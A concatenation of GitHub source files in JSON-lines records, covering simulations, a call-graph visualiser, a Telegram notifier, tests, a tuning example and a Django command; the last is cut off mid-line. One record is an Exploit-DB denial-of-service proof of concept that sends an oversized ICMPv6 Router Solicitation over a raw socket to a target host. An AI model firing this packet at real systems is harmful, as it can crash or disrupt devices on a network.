Class instantiating simulated agents\r\n\r\n# Set and iterate over simulation parameters\r\ndef main():\r\n\tparams = {\r\n\t\t# Strings\r\n\t\t'PATH': 'data',\r\n\t\t'NETWORK_TYPE': 'COMPLETE', # COMPLETE or RELAXED_CAVEMAN\r\n\t\t\r\n\t\t# Integers\r\n\t\t'N_RUNS': 20, # Number of simulations per parameter value\r\n\t\t'N_STEPS': 10000, # Maximum number of time steps\r\n\t\t'N_AGENTS': 400, # Number of agents\r\n\t\t'N_GROUPS': 20, # Number of groups\r\n\t\t\r\n\t\t# Floats\r\n\t\t'P_REWIRE': 0.2, # Probability of a within-group connection being rewired\r\n\t\t'P_BIAS': frange(0, 0.9, 0.1), # Ingroup copying bias strength\r\n\t\t'P_INNOVATE': 0.01, # Probability of innovation\r\n\t\t'P_COPY': [.1, .2], # Probability of copying\r\n\t\t'MU': 1.5, # How strongly innovation depends on cultural diversity\r\n\t\t'P_REPLACE': 0.001, # Replacement rate\r\n\t}\r\n\t\r\n\t# Parameters to iterate over\r\n\titr = [p for p in params if isinstance(params[p], list)]\r\n\t\r\n\t# If we're iterating over more than one parameter, iterate over the parameter with fewer settings first\r\n\tif len(itr) > 1 and len(params[itr[1]]) < len(params[itr[0]]):\r\n\t\titr[0], itr[1] = itr[1], itr[0]\r\n\t\r\n\t# Not iterating over any parameter\r\n\tif len(itr) == 0:\r\n\t\t# Run simulations in parallel\r\n\t\trun_parallel(params)\r\n\t\t\r\n\t# Iterating over at least one parameter\r\n\telse:\r\n\t\t# Iterate over the first parameter\r\n\t\tfor i in range(len(params[itr[0]])):\r\n\t\t\t# Set the first parameter\r\n\t\t\tcurrent = copy.deepcopy(params)\r\n\t\t\tcurrent[itr[0]] = params[itr[0]][i]\r\n\t\t\t\r\n\t\t\t# Print the current parameter\r\n\t\t\tprint('[{0}={1}]'.format(itr[0], 
current[itr[0]]))\r\n\t\t\t\r\n\t\t\t# Iterating over only one parameter\r\n\t\t\tif len(itr) == 1:\r\n\t\t\t\t# Set the current path\r\n\t\t\t\tcurrent['PATH'] = '{0}/{1}={2}'.format(params['PATH'], itr[0], current[itr[0]])\r\n\t\t\t\t\r\n\t\t\t\t# Run simulations in parallel\r\n\t\t\t\trun_parallel(current)\r\n\t\t\t\t\r\n\t\t\t# Iterating over two parameters\r\n\t\t\telif len(itr) == 2:\r\n\t\t\t\t# Iterate over the second parameter\r\n\t\t\t\tfor j in range(len(params[itr[1]])):\r\n\t\t\t\t\t# Set the second parameter\r\n\t\t\t\t\tcurrent[itr[1]] = params[itr[1]][j]\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Set the current path\r\n\t\t\t\t\tcurrent['PATH'] = '{0}/{1}={2}/{3}={4}'.format(params['PATH'], itr[0], current[itr[0]], itr[1], current[itr[1]])\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Print the current parameter\r\n\t\t\t\t\tprint(' [{0}={1}]'.format(itr[1], current[itr[1]]))\r\n\t\t\t\t\t\r\n\t\t\t\t\t# Run simulations in parallel\r\n\t\t\t\t\trun_parallel(current)\r\n\r\n# Run multiple simulations in parallel\t\t\r\ndef run_parallel(params):\r\n\t# Set the number of threads to the cpu count (or override by passing the desired number of threads as a command line argument)\r\n\tpool = Pool(cpu_count() if len(sys.argv) == 1 else int(sys.argv[1]))\r\n\tpool.map(run, [params] * params['N_RUNS'])\r\n\tpool.close()\r\n\r\n# Run a simulation\r\ndef run(params):\r\n\t# Create agents\r\n\tagents = []\r\n\tfor i in range(params['N_AGENTS']):\r\n\t\tgroup = math.floor(i / params['N_AGENTS'] * params['N_GROUPS'])\r\n\t\tagents.append(agent.Agent(params, group))\r\n\t\r\n\t# Generate a complete graph\r\n\tif params['NETWORK_TYPE'] == 'COMPLETE':\r\n\t\tgraph = nx.complete_graph(params['N_AGENTS'])\r\n\t# Generate a relaxed caveman graph\r\n\telif params['NETWORK_TYPE'] == 'RELAXED_CAVEMAN':\r\n\t\tgraph = None\r\n\t\t# Repeat until the graph does not contain any isolated agents\r\n\t\twhile graph is None or nx.degree_histogram(graph)[0] > 0:\r\n\t\t\tgraph = nx.generators.relaxed_caveman_graph(params['N_GROUPS'], round(params['N_AGENTS'] / params['N_GROUPS']), params['P_REWIRE'])\r\n\t\r\n\t# Each individual's list of neighbors and the subset belonging to the ingroup\r\n\tneighbors = []\r\n\tneighbors_ig = []\r\n\tfor i in range(params['N_AGENTS']):\r\n\t\tneighbors.append(list(nx.neighbors(graph, i)))\r\n\t\tneighbors_ig.append([])\r\n\t\tfor j in neighbors[i]:\r\n\t\t\tif agents[i].group == agents[j].group:\r\n\t\t\t\tneighbors_ig[i].append(j)\r\n\t\r\n\t# Initialize data tracking\r\n\tdata = [[0 for j in range(2)] for i in range(params['N_STEPS'] + 1)] \r\n\tdata[0][0] = 'trait_types'\r\n\tdata[0][1] = 'trait_complexity'\r\n\r\n\t# Time step\r\n\tfor step in range(params['N_STEPS']):\r\n\t\t# Randomize interaction order\r\n\t\torder = list(range(len(agents)))\r\n\t\trand.shuffle(order)\r\n\t\t\r\n\t\t# Innovation phase\r\n\t\tfor i in order:\r\n\t\t\tagents[i].il(params)\r\n\t\t\r\n\t\t# Social learning phase\r\n\t\tfor i in order:\r\n\t\t\t# Apply the ingroup copying bias\r\n\t\t\tif rand.random() < params['P_BIAS'] and len(neighbors_ig[i]) > 0:\r\n\t\t\t\tj = rand.randint(0, len(neighbors_ig[i]) - 1)\r\n\t\t\t\tpartner = agents[neighbors_ig[i][j]]\r\n\t\t\t# Copy at random\r\n\t\t\telse:\r\n\t\t\t\tj = rand.randint(0, len(neighbors[i]) - 1)\r\n\t\t\t\tpartner = agents[neighbors[i][j]]\r\n\t\t\t\r\n\t\t\tagents[i].sl(params, partner)\r\n\t\t\r\n\t\t# Exhibition phase\r\n\t\tfor i in order:\r\n\t\t\tagents[i].exhibit()\r\n\t\t\r\n\t\t# Replacement phase\r\n\t\tfor i in order:\r\n\t\t\tif rand.random() < 
params['P_REPLACE']:\r\n\t\t\t\tagents[i] = agent.Agent(params, agents[i].group)\r\n\t\t\r\n\t\t# Record data\r\n\t\tdata[step + 1][0] = sum([len(a.trait_types) for a in agents]) / params['N_AGENTS']\r\n\t\tdata[step + 1][1] = sum([max(a.trait_levels, default=0) for a in agents]) / params['N_AGENTS']\r\n\r\n\t# Make sure the directory path exists\r\n\tif not os.path.isdir(params['PATH']):\r\n\t\tos.makedirs(params['PATH'])\r\n\t\r\n\t# Save data to a new directory\r\n\tpath = create_dir(params)\r\n\twith open(path + '/results.csv', 'w') as file:\r\n\t\tfor i in range(len(data)):\r\n\t\t\tfile.write(','.join(map(str, data[i])) + '\\n')\r\n\r\n# Create a list of evenly spaced parameter values\r\ndef frange(start, stop, step, digits=5):\r\n\treturn([round(start + step * i, digits) for i in range(round((stop - start) / step) + 1)])\r\n\r\n# Create a new numbered directory\r\ndef create_dir(params):\r\n\tdir = 0\r\n\twhile os.path.isdir('{0}/{1}'.format(params['PATH'], dir)):\r\n\t\tdir += 1\r\n\tpath = '{0}/{1}'.format(params['PATH'], dir)\r\n\t\r\n\ttry:\r\n\t\tos.makedirs(path)\r\n\texcept:\r\n\t\tpath = create_dir(params)\r\n\t\r\n\treturn(path)\r\n\r\n# Make sure this is an independent process\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"MarcelMontrey/IngroupDiversity","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"71475128373","text":"from __future__ import print_function\n\nimport inspect\nimport logging\nimport copy\nimport os\nimport shutil\nfrom pathlib import Path\nimport graphviz as gviz\nimport __main__\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\ntry:\n    __IPYTHON__ = get_ipython()\n    import ipykernel.zmqshell\n    import IPython.terminal.interactiveshell\n    #if float(gviz.__version__[0:3]) < 1.4:\n    #    raise RuntimeError(\"IPython used with pygraphviz < 1.4 will experience \"\n    #                       \"some bugs\")\n    #from IPython.display import Image\nexcept NameError:\n    __IPYTHON__ = None\n\ntry:\n    __main__file__ = inspect.getfile(__main__)\nexcept TypeError:\n    if __IPYTHON__:\n        __main__file__ = \" 1:\n            sg = gviz.Digraph(name=\"foo\")\n            sg.graph_attr['rank'] = 'same'\n            prev_node = None\n            for child_node in child_nodes:\n                if prev_node:\n                    sg.edge(str(prev_node), str(child_node),\n                            color=\"#ffffff\")\n                prev_node = child_node\n            g.subgraph(sg)\"\"\"\n\n        # g.graph_attr['label']='nodes=%s' % count\n        self.graph = g\n        print(\"callviz: rendered to %s\" % (str(count)+self.filename))\n        g.render(filename=str(count)+filename)\n\n        # if not __IPYTHON__ or isinstance(__IPYTHON__, IPython.terminal.interactiveshell.TerminalInteractiveShell):\n        #     print(\"callviz: rendered to %s\" % (str(count)+self.filename))\n        #     g.render(filename=str(count)+filename)\n        #\n        # elif isinstance(__IPYTHON__, ipykernel.zmqshell.ZMQInteractiveShell):\n        #     print(\"callviz: Rendering in inline in Jupyter Notebook 2\")\n        #     g.render(filename=str(count)+filename)\n        #     return g\n        count+=1\n        os.chdir(absPath+'/pics')\n\n\n    def _repr_svg_(self):\n        svg = self.render()._repr_svg_()\n        self.reset()\n        return svg\n\nclass NodeData(object):\n    def __init__(self, _args=None, _kwargs=None, _fnname=\"\",\n                 _ret=None, _childmethods=[]):\n        self.args = _args\n        self.kwargs = _kwargs\n        self.fn_name = _fnname\n        self.ret = _ret\n        self.child_methods = _childmethods  # [ (method, gcounter) ]\n\n        self.auxdata = {}  # user assigned track data\n\n    def __str__(self):\n        return \"%s -> 
child_methods: %s\" % (self.nodestr(), self.child_methods)\n\n def nodestr(self):\n return \"%s = %s(%s)\" % (self.ret, self.fn_name, self.argstr())\n\n def argstr(self):\n s_args = \",\".join([str(arg) for arg in self.args])\n s_kwargs = \",\".join([(str(k), str(v))\n for (k, v) in self.kwargs.items()])\n return \"%s%s\" % (s_args, s_kwargs)\n\nclass viz(object):\n \"\"\"decorator to construct the call graph with args\n and return values as labels\n \"\"\"\n\n def __init__(self, callgraph, *args, **kwargs):\n \"\"\"\n If there are decorator arguments, the function\n to be decorated is not passed to the constructor!\n \"\"\"\n self._verbose = False\n if not isinstance(callgraph, CallGraph):\n raise ValueError(\"@viz decorator must be called with a CallGraph instance\")\n self.callgraph = callgraph\n\n def track(self, **kwargs):\n fullstack = trim_stack(inspect.stack())\n call_frame_id = id(fullstack[2][0])\n g_callers = self.callgraph.get_callers()\n node = g_callers.get(call_frame_id)\n if node:\n node.auxdata.update(copy.deepcopy(kwargs))\n\n def __call__(self, f, *args, **kwargs):\n \"\"\"\n With decorator arguments, __call__() is only called\n once, as part of the decoration process! You can only give\n it a single argument, which is the function object.\n \"\"\"\n\n\n def wrapped_f(*args, **kwargs):\n # id_count = 0\n # Expected parameters for the function being wrapped\n g_callers = self.callgraph.get_callers()\n g_frames = self.callgraph.get_frames()\n\n # find the caller frame, and add self as a child node\n caller_frame_id = None\n\n fullstack = trim_stack(inspect.stack())\n\n if self._verbose:\n logging.debug(\"Full Stack:\")\n for stack in fullstack:\n logging.debug(\"\\t\" + str(stack))\n\n if len(fullstack) > 2:\n caller_frame_id = id(fullstack[2][0])\n\n if self._verbose:\n logging.debug(\"Caller Frame: %s %s\" % (caller_frame_id,\n fullstack[2]))\n\n this_frame_id = id(fullstack[0][0])\n if self._verbose:\n logging.info(\"This Frame: %s %s\" % (this_frame_id, fullstack[0]))\n\n if this_frame_id not in g_frames:\n g_frames.append(fullstack[0][0])\n\n if this_frame_id not in g_callers.keys():\n g_callers[this_frame_id] = NodeData(args, kwargs,\n f.__name__,\n None, [])\n\n edgeinfo = None\n if caller_frame_id:\n edgeinfo = [this_frame_id, self.callgraph.get_counter()]\n print(caller_frame_id)\n print(list(g_callers.keys())[0])\n #whats the differentiator of the submit address and recursive addresses\n if int(str(caller_frame_id)[0]) == 4:\n caller_frame_id = list(g_callers.keys())[0]\n #if not 4, change to len, or different differentiator\n\n if (this_frame_id!= caller_frame_id):\n g_callers[caller_frame_id].child_methods.append(edgeinfo)\n self.callgraph.increment()\n\n\n ret = f(*args, **kwargs)\n g_callers[this_frame_id].ret = copy.deepcopy(ret)\n\n if self._verbose:\n logging.debug('Unwinding Frame ID: %s' % this_frame_id)\n\n if edgeinfo:\n edgeinfo.append(self.callgraph.get_unwindcounter())\n self.callgraph.increment_unwind()\n\n return ret\n\n wrapped_f.track = self.track\n return wrapped_f\n","repo_name":"beehaa/Visualizing-Recursive-Trees","sub_path":"algs_final/rcviz/rcviz.py","file_name":"rcviz.py","file_ext":"py","file_size_in_byte":10446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39904942502","text":"import logging\nimport time\nfrom urllib.parse import urljoin\n\nfrom notification_provider import provider\nfrom utils.config_reader import AbsConfigReader\nfrom utils.helper import 
get_request_controller, retry\n\n\nclass TelegramNotificationProvider(provider.NotificationProvider):\n    def __init__(self, name: str, config_reader: AbsConfigReader) -> None:\n        self.config_reader = config_reader\n        self.name = name\n        self.request_handler = get_request_controller()\n        self.type, self.enable, self.host, self.token, self.channel_name, self.chat_id = \\\n            self._init_conf(config_reader)\n        if not self.chat_id and self.enable:\n            self.chat_id = self.get_channel_chat_id(self.channel_name)\n            if self.chat_id:\n                self.save_conf(channel_chat_id=self.chat_id)\n\n    @staticmethod\n    def _init_conf(config_reader: AbsConfigReader) -> tuple:\n        conf = config_reader.read()\n        return conf.get(\"type\"), conf.get(\"enable\", False), conf.get(\"host\"), conf.get(\"bot_token\"), conf.get(\n            \"channel_name\"), conf.get(\"channel_chat_id\")\n\n    def get_provider_name(self) -> str:\n        return self.name\n\n    def provider_enabled(self) -> bool:\n        return self.enable\n\n    def get_channel_chat_id(self, channel_name) -> str:\n        url = urljoin(self.host, f\"/bot{self.token}/getUpdates\")\n        resp = self.request_handler.get(url, timeout=5).json()\n        for res in resp.get(\"result\", [])[::-1]:\n            for value in res.values():\n                if isinstance(value, dict):\n                    chat = value.get(\"chat\", {})\n                    if chat.get(\"type\") == \"channel\" and chat.get(\"title\") == channel_name:\n                        return chat.get(\"id\")\n        logging.error(\"[Telegram] chat_id not found, response: %s\", resp)\n        return \"\"\n\n    @retry()\n    def push(self, title, **kwargs) -> bool:\n        url = urljoin(self.host, f\"/bot{self.token}/sendMessage\")\n        text = self.format_message(title, **kwargs)\n        data = {\n            'chat_id': self.chat_id,\n            'text': text,\n            'parse_mode': 'Markdown'}\n        resp = self.request_handler.post(url, data=data, timeout=5).json()\n        if resp.get(\"ok\"):\n            return True\n        if resp.get(\"error_code\") == 400:\n            # The formatted Markdown text failed to parse on Telegram's side;\n            # log it so the formatting issue can be analyzed later.\n            logging.error(\n                \"[Telegram] push failed, exc:%s, text:%s\", resp.get(\"description\"), text\n            )\n        if resp.get(\"error_code\") == 429:\n            # Rate limited: sleep for the interval Telegram suggests, then raise\n            # so the @retry decorator sends the message again.\n            retry_after = resp.get(\"parameters\", {}).get(\"retry_after\", 5)\n            time.sleep(retry_after)\n            raise Exception(\"rate limited, retry after sleep\")\n        return False\n\n    def format_message(self, title, **kwargs) -> str:\n        message = [f\"*{title}*\"] if title else []\n        for key, value in kwargs.items():\n            message.append(f\"`{key}`: {value}\")\n        return \"\\n\".join(message)\n\n    def save_conf(self, **kwargs) -> None:\n        logging.info(\"[Telegram] update telegram conf: %s\", kwargs)\n        self.config_reader.parcial_update(lambda notification_conf: notification_conf[\"telegram\"].update(kwargs))\n","repo_name":"opennaslab/kubespider","sub_path":"kubespider/notification_provider/telegram_notification_provider/provider.py","file_name":"provider.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":1636,"dataset":"github-code","pt":"21"}
+{"seq_id":"22665496632","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport unittest\nfrom google_page import GooglePage\n\nclass TestGoogle(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        cls.driver = webdriver.Chrome(ChromeDriverManager().install())\n    \n    def test_google(self):\n        google = GooglePage(self.driver)\n        google.open()\n        google.search('Platzi')\n        self.assertEqual('Platzi', google.keyboard)\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.driver.close()\n\nif __name__ == \"__main__\":\n    
unittest.main(verbosity=2)\n\n","repo_name":"JFOZ1010/Python-Files-Proofs","sub_path":"selenium/test_google.py","file_name":"test_google.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3653544941","text":"\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the equalizeArray function below.\r\ndef equalizeArray(arr):\r\n temp = []\r\n counts = []\r\n\r\n for i in range(len(arr)):\r\n found = 0\r\n for j in range(len(temp)):\r\n if temp[j] == arr[i]:\r\n counts[j] = counts[j] + 1\r\n found = 1\r\n if found == 0:\r\n temp.append(arr[i])\r\n counts.append(1)\r\n\r\n #print(temp)\r\n #print(counts)\r\n print (len(arr)-max(counts))\r\n #return (len(arr)-max(counts))\r\n print (len(arr)-max([arr.count(i) for i in arr]))\r\n return len(arr)-max([arr.count(i) for i in arr])\r\n \r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n result = equalizeArray(arr)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()","repo_name":"ruiteng2021/HackerRank","sub_path":"Python/EqualizeTheArray/EqualizeTheArray.py","file_name":"EqualizeTheArray.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32503762578","text":"from struct import pack\nimport socket\nimport sys\n\nND_ROUTER_SOLICIT = 133\nICMP6_OPT_SOURCE_MAC = 1\n\ndef u8(x):\n return pack(\"B\", x)\n\ndef send_packet(data, host):\n print(\"[+] sending {} bytes to {}\".format(len(data), host))\n s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))\n\n if s.sendto(data, (host, 0)) != len(data):\n print(\"[!] Could not send (full) payload\")\n s.close()\n\nif __name__ == '__main__':\n assert len(sys.argv) == 2, \"Run via {} \".format(sys.argv[0])\n host, = sys.argv[1:]\n pkg = b\"\".join([\n u8(ND_ROUTER_SOLICIT), # type\n u8(0), # code\n b\"X\" * 2, # checksum\n b\"\\x00\" * 4, # reserved\n u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac\n u8(255), # Have 255 MACs!\n b\"A\" * 255 * 8,\n ])\n\n send_packet(pkg, host)\n","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/multiple/dos/42942.py","file_name":"42942.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"73028137973","text":"from __future__ import print_function, division\n\n\nimport pysmac\nimport numpy\nimport sklearn.ensemble\nimport sklearn.datasets\nimport sklearn.cross_validation\n\n\n# We use the same data as the earlier sklearn example.\nX,Y = sklearn.datasets.make_classification(1000, n_features=20, n_informative=10, n_classes=10, random_state=2)\t\t# seed yields a mediocre initial accuracy on my machine\n\n# But this time, we do not split it into train and test data set, but we will use\n# k-fold cross validation instead to estimate the accuracy better. Here,we shall\n# use k=10 for demonstration purposes. 
To make things more convenient later on,\n# let's convert the KFold iterator into a list, so we can use indexing.\nkfold = [(train,test) for (train,test) in sklearn.cross_validation.KFold(X.shape[0], 10)]\n\n# To demonstrate the use of features, let's use the class frequencies of a fold\n# as features. It will turn out that those are not informative features, as they are\n# almost all identical, but good dataset features are beyond the scope of this example.\nfeatures = numpy.array([numpy.bincount(Y[test], minlength=10) for (train, test) in kfold])\n\n# We have to make a slight modification to the function fitting the random forest:\n# it now has to take an additional argument, instance. (Note: SMAC grew historically\n# in the context of algorithm configuration, where the performance across multiple\n# instances is optimized. The naming convention is a tribute to that heritage.)\n# This argument will be an integer between 0 and num_instances (defined below).\n# Note that this increases the computational effort, as SMAC now estimates the \n# quality of a parameter setting for multiple instances.\ndef random_forest(n_estimators,criterion, max_features, max_depth, bootstrap, instance):\n\n\t# Use the requested fold\n\ttrain, test = kfold[instance]\n\tX_train, Y_train, X_test, Y_test = X[train], Y[train], X[test], Y[test]\n\t\n\tpredictor = sklearn.ensemble.RandomForestClassifier(n_estimators = n_estimators, criterion=criterion, max_features = max_features, max_depth = max_depth, bootstrap=bootstrap)\n\tpredictor.fit(X_train, Y_train)\n\t\n\treturn -predictor.score(X_test, Y_test)\n\n\n# Convenience function to compute the true mean accuracy across all\n# 10 folds.\ndef true_accuracy(**config):\n\taccuracy = 0.\n\n\tpredictor = sklearn.ensemble.RandomForestClassifier(**config)\n\tfor train, test in kfold:\n\t\tX_train, Y_train, X_test, Y_test = X[train], Y[train], X[test], Y[test]\n\t\tpredictor.fit(X_train, Y_train)\n\t\taccuracy += predictor.score(X_test, Y_test)\n\treturn(accuracy/len(kfold))\n\nprint('The default accuracy is %f'%true_accuracy())\n\t\n\n# We haven't changed anything here.\nparameter_definition=dict(\\\n\t\tmax_depth   =(\"integer\", [1, 10], 4),\n\t\tmax_features=(\"integer\", [1, 20], 10),\n\t\tn_estimators=(\"integer\", [1,100], 10, 'log'),\t\t\t\n\t\tcriterion   =(\"categorical\", ['gini', 'entropy'], 'entropy'),\n\t\tbootstrap   =(\"integer\", [0,1], 1)\n\t\t)\n\n# Same creation of the SMAC_optimizer object\nopt = pysmac.SMAC_optimizer( working_directory = '/tmp/pysmac_test/',# the folder where SMAC generates output\n\t\t\t\t\t\t\t persistent_files=True,\t\t\t\t  # whether the output will persist beyond the python object's lifetime\n\t\t\t\t\t\t\t debug = False\t\t\t\t\t\t\t # if something goes wrong, enable this for diagnostic output\n\t\t\t\t\t\t\t)\n
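\n# Added note (not part of the original example): a quick per-instance spot-check\n# of the objective before handing it to SMAC. The argument values are arbitrary\n# but follow random_forest's signature\n# (n_estimators, criterion, max_features, max_depth, bootstrap, instance).\nprint('Per-instance losses for one setting: %s'%[random_forest(10, 'entropy', 10, 4, 1, inst) for inst in range(3)])\n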
\n\n# The minimize method also has optional arguments\nvalue, parameters = opt.minimize(random_forest,\n\t\t\t\t\t200, parameter_definition,\n\t\t\t\t\tnum_runs = 2,\t\t\t\t\t# number of independent SMAC runs\n\t\t\t\t\tseed = 0,\t\t\t\t\t\t# the random seed used. can be an int or a list of ints of length num_runs\n\t\t\t\t\tnum_procs = 2,\t\t\t\t\t# pysmac can harness multicore architectures. Specify the number of processes to use here.\n\t\t\t\t\tnum_train_instances = len(kfold),\t# this tells SMAC how many different instances there are\n\t\t\t\t\ttrain_instance_features = features\t# use the features defined above to better predict the overall performance\n\t\t\t\t\t)\n\t\nprint('Parameter setting %s'%parameters)\nprint('The highest accuracy estimation: %f'%(-value))\nprint('The highest accuracy actually is: %f'%(true_accuracy(**parameters)))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/automl_pysmac/pysmac-master/examples/sklearn_example_advanced_crossvalidation.py","file_name":"sklearn_example_advanced_crossvalidation.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"}
+{"seq_id":"11177431904","text":"#!/usr/bin/python3\n\n#Part 2F\nimport Regression as reg\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nalpha = np.linspace(0.001,10,100)\n\ndataset = datasets.fetch_california_housing()\nX_train, X_test, y_train, y_test = train_test_split(dataset['data'],\n                                                    dataset['target'],\n                                                    test_size=0.2,\n                                                    random_state=42)\n\nmodel1 = reg.LinearRegression()\nmodel2 = reg.RidgeRegression()\n\n\nr2_LR_m1 = []\nr2_RR_m2 = []\n\nmodels = [model1, model2]\nfor aval in alpha:\n    model1.set_params(alpha = aval)\n    model2.set_params(alpha = aval)\n    \n    model1.fit(X_train, y_train);\n    model2.fit(X_train, y_train);\n    \n    r2_m1 = model1.score(X_test, y_test)\n    r2_m2 = model2.score(X_test, y_test)\n    r2_LR_m1.append(r2_m1)\n    r2_RR_m2.append(r2_m2)\n    \n    \nplt.figure(figsize = (6,6))\nplt.plot(alpha, r2_LR_m1, 'g-', label = \"Model 1: Linear Regression R2 scores\")\nplt.plot(alpha, r2_RR_m2, 'r-', label = \"Model 2: Ridge Regression R2 scores\")\nplt.title(\"Comparison of Ridge and Linear Regression R2 scores\")\nplt.xlabel(\"Alpha values\")\nplt.xscale(\"log\")\nplt.ylabel(\"R2 scores\")\nplt.legend()\nplt.draw()\nplt.savefig(\"P2F.png\", dpi = 300, bbox_inches = 'tight')\n\nplt.show()\n    \n    \n\n","repo_name":"Adritsheu/Systems_development","sub_path":"homework/HW3/HW3-final/model_performance.py","file_name":"model_performance.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"7996568692","text":"from tabulate import tabulate\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom plom.scan.question_list_utils import check_question_list\nfrom Papers.services import SpecificationService\nfrom ...services import ScanCastService, ScanService\n\n\nclass Command(BaseCommand):\n    \"\"\"python3 manage.py plom_staging_assign_extra (list | papers | assign | clear) [options].\"\"\"\n\n    help = \"\"\"Assign an extra page to a paper and question(s). 
Note that\n this command cannot cast a page to the 'extra'-type, instead one\n should use the plom_staging_extralise command.\"\"\"\n\n def list_paper_numbers(self, bundle_name):\n scanner = ScanService()\n paper_numbers = scanner.get_bundle_paper_numbers_cmd(bundle_name)\n self.stdout.write(f\"Papers in bundle {bundle_name}: {paper_numbers}\")\n\n def list_extra_pages(self, bundle_name):\n scanner = ScanService()\n bundle_page_dict = scanner.get_bundle_extra_pages_info_cmd(bundle_name)\n bundle_page_list = [[\"order\", \"status\", \"info\", \"rotation\"]]\n for ord in sorted(bundle_page_dict.keys()):\n page = bundle_page_dict[ord]\n if page[\"info\"][\"paper_number\"] and page[\"info\"][\"question_list\"]:\n bundle_page_list.append(\n [\n page[\"order\"],\n page[\"status\"],\n f\"paper {page['info']['paper_number']}: q{page['info']['question_list']}\",\n page[\"rotation\"],\n ]\n )\n else:\n bundle_page_list.append(\n [\n page[\"order\"],\n page[\"status\"],\n \"extra page without data\",\n page[\"rotation\"],\n ]\n )\n\n self.stdout.write(\n tabulate(bundle_page_list, headers=\"firstrow\", tablefmt=\"simple_outline\")\n )\n\n def assign_extra_page(\n self, username, bundle_name, index, paper_number, question_list\n ):\n scs = ScanCastService()\n try:\n scs.assign_extra_page_cmd(\n username, bundle_name, index, paper_number, question_list\n )\n except ValueError as e:\n raise CommandError(e)\n\n def clear_extra_page_data(self, username, bundle_name, index):\n scs = ScanCastService()\n scs.clear_extra_page_cmd(username, bundle_name, index)\n\n def add_arguments(self, parser):\n sp = parser.add_subparsers(\n dest=\"command\",\n description=\"Assign an extra page to a paper and questions.\",\n )\n spl = sp.add_parser(\"list\", help=\"List the extra pages in the bundle.\")\n spl.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n\n spp = sp.add_parser(\n \"papers\", help=\"List the known paper-numbers in the bundle.\"\n )\n spp.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n\n spa = sp.add_parser(\n \"assign\", help=\"Assign the extra page a paper-number and question-list.\"\n )\n spa.add_argument(\"username\", type=str, help=\"username doing the assigning.\")\n spa.add_argument(\n \"bundle\",\n type=str,\n help=\"The bundle on which to operate\",\n )\n spa.add_argument(\n \"-i\", \"--index\", type=int, help=\"index of page within the bundle (from one)\"\n )\n spa.add_argument(\n \"-t\", \"--paper\", type=int, help=\"the paper-number of the extra-page\"\n )\n spa.add_argument(\n \"-q\",\n \"--question\",\n nargs=\"?\",\n metavar=\"N\",\n help=\"\"\"\n Which question(s) are answered on this page?\n You can pass a single integer, or a list like `[1,2,3]`\n which updates each page to questions 1, 2 and 3.\n You can also pass the special string `all` which uploads\n the page to all questions (this is also the default).\n \"\"\",\n )\n spc = sp.add_parser(\n \"clear\",\n help=\"Clear the extra-page data from the given extra-page in the bundle\",\n )\n spc.add_argument(\"username\", type=str, help=\"username doing the clearing.\")\n spc.add_argument(\n \"-i\", \"--index\", type=int, help=\"index of page within the bundle (from one)\"\n )\n\n def handle(self, *args, **options):\n if options[\"command\"] == \"list\":\n self.list_extra_pages(options[\"bundle\"])\n elif options[\"command\"] == \"papers\":\n self.list_paper_numbers(options[\"bundle\"])\n elif options[\"command\"] == \"assign\":\n if options[\"question\"] is 
